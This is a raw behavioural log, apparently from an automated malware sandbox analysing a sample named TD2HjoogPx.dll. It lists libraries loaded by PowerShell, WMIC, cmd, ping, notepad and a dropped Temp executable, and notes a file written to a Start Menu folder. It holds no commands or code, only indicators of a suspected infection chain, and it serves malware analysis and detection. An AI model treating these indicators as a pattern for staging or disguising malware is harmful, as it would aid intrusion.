Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TD2HjoogPx.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
